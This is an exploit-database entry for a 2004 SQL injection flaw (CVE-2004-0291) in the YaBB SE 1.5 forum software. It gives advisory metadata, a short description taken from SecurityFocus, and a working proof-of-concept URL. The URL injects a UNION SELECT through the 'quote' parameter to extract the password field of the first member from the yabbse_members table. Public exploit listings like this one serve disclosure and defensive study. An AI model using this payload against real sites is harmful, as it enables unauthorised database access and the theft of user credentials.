YABB SE 1.5 - 'Quote' SQL Injection

Author: BaCkSpAcE
type: webapps
platform: php
port: 
date_added: 2004-02-16  
date_updated: 2012-12-27  
verified: 1  
codes: CVE-2004-0291;OSVDB-3971  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23710.txt  

source: https://www.securityfocus.com/bid/9674/info

It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software.

YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.

http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
l,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*